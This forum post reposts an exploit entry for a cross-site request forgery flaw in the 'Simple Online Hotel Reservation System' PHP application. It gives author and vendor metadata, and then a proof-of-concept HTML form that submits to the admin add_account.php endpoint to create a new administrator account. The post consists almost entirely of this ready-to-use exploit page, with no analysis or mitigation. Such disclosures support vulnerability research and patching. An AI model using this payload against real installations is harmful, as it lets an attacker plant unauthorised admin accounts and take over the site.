Jump to content

Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin)

风尘剑心

By 风尘剑心,
in CHT Vulnerability database

Recommended Posts

风尘剑心 Rising Star

风尘剑心

Posted
  • Group:  Members
  • Content Count:  423
  • Achievement Points:  2,540
  • With Us For:  155 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows
Posted 
# Exploit Title: Simple Online Hotel Reservation System  - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1 

# PoC:

<html>
<head>
	<title>Add Admin</title>
</head>
<body>
	<form method = "POST" action="http://localhost/[PATH]/admin/add_account.php">
		<label>Name </label>
		<input type = "text" name = "name" /><br><br>
		<label>Username </label>
		<input type = "text" name = "username" /><br><br>
		<label>Password </label>
		<input type = "password" name = "password" /><br><br>
		<button name = "add_account">Saved</button>
	</div>
	</form>
</body>
</html>
Link to comment
Share on other sites
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...